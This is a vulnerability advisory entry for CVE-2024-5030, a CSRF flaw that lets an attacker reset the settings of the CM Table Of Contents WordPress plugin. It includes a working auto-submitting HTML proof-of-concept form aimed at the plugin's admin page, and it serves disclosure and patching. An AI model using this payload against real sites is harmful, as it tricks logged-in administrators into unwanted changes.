CM Table Of Contents – WordPress TOC Plugin < 1.2.3 – Settings Reset via CSRF | CVE 2024-5030 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when resetting its settings, which could allow attackers to make a logged in admin perform such action via a CSRF attack

Proof of Concept

Make a logged in admin open an HTML file containing:

```
<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=cmtoc_settings" method="POST">
      <input type="hidden" name="cmtoc&#95;table&#95;of&#95;contentsPluginCleanup" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
```

Affects Plugins

cm-table-of-content

Fixed in 1.2.3

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Felipe Caon

Submitter

caon

Submitter website

https://caon.io

Verified

Yes

WPVDB ID

2c2e994c-31bd-4de4-9480-b86f980d4130

Timeline

Publicly Published

2024-10-28 (about 1 year ago)

Added

2024-10-28 (about 1 year ago)

Last Updated

2024-10-28 (about 1 year ago)

Other

Published

Title

Published

2024-03-11

Title

LadiApp: Landing Page, PopupX, Marketing Automation, Affiliate Marketing… <= 4.4 - Cross-Site Request Forgery via publish_lp()

Published

2025-08-20

Title

JobZilla - Job Board WordPress Theme < 2.0.1 - Cross-Site Request Forgery

Published

2025-04-01

Title

Theme Duplicator <= 1.1 - Cross-Site Request Forgery

Published

2025-03-24

Title

Image Captcha <= 1.2 - Cross-Site Request Forgery

Published

2025-06-27

Title

Address Autocomplete via Google for Gravity Forms < 1.3.5 - CSRF